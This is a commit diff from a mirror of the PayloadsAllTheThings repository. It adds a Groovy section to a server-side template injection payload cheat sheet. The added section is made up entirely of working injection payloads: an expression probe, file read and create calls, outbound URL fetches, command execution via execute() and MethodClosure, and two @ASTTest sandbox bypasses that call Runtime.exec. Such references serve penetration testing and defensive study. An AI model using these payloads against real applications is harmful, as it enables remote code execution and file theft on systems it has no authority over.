mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
added Groovy EL section
This commit is contained in:
parent
521975a05c
commit
3db4d04467
@ -15,6 +15,12 @@
|
|||||||
* [Freemarker](#freemarker)
|
* [Freemarker](#freemarker)
|
||||||
* [Basic injection](#freemarker---basic-injection)
|
* [Basic injection](#freemarker---basic-injection)
|
||||||
* [Code execution](#freemarker---code-execution)
|
* [Code execution](#freemarker---code-execution)
|
||||||
|
* [Groovy](#groovy)
|
||||||
|
* [Basic injection](#groovy---basic-injection)
|
||||||
|
* [Read/Create file](#groovy---read-and-create-file)
|
||||||
|
* [HTTP Request](#groovy---http-request)
|
||||||
|
* [Command execution](#groovy---command-execution)
|
||||||
|
* [Sandbox bypass](#groovy---sandbox-bypass)
|
||||||
* [Handlebars](#handlebars)
|
* [Handlebars](#handlebars)
|
||||||
* [Jade / Codepen](#jade--codepen)
|
* [Jade / Codepen](#jade--codepen)
|
||||||
* [Java](#java)
|
* [Java](#java)
|
||||||
@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")}
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
## Groovy
|
||||||
|
|
||||||
|
[Official website](https://groovy-lang.org/)
|
||||||
|
|
||||||
|
|
||||||
|
### Groovy - Basic injection
|
||||||
|
|
||||||
|
Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
|
||||||
|
|
||||||
|
|
||||||
|
### Groovy - Read and create File
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
String x = new File('c:/windows/notepad.exe').text
|
||||||
|
String x = new File('/path/to/file').getText('UTF-8')
|
||||||
|
new File("C:\Temp\FileName.txt").createNewFile();
|
||||||
|
```
|
||||||
|
|
||||||
|
### Groovy - HTTP request:
|
||||||
|
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
"http://www.google.com".toURL().text
|
||||||
|
new URL("http://www.google.com").getText()
|
||||||
|
```
|
||||||
|
|
||||||
|
### Groovy - Command Execution
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
"calc.exe".exec()
|
||||||
|
"calc.exe".execute()
|
||||||
|
this.evaluate("9*9") //(this is a Script)
|
||||||
|
new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
|
||||||
|
```
|
||||||
|
|
||||||
|
### Groovy - Sandbox Bypass
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
|
||||||
|
def x
|
||||||
|
```
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Handlebars
|
## Handlebars
|
||||||
|
|
||||||
[Official website](https://handlebarsjs.com/)
|
[Official website](https://handlebarsjs.com/)
|
||||||
|
Loading…
Reference in New Issue
Block a user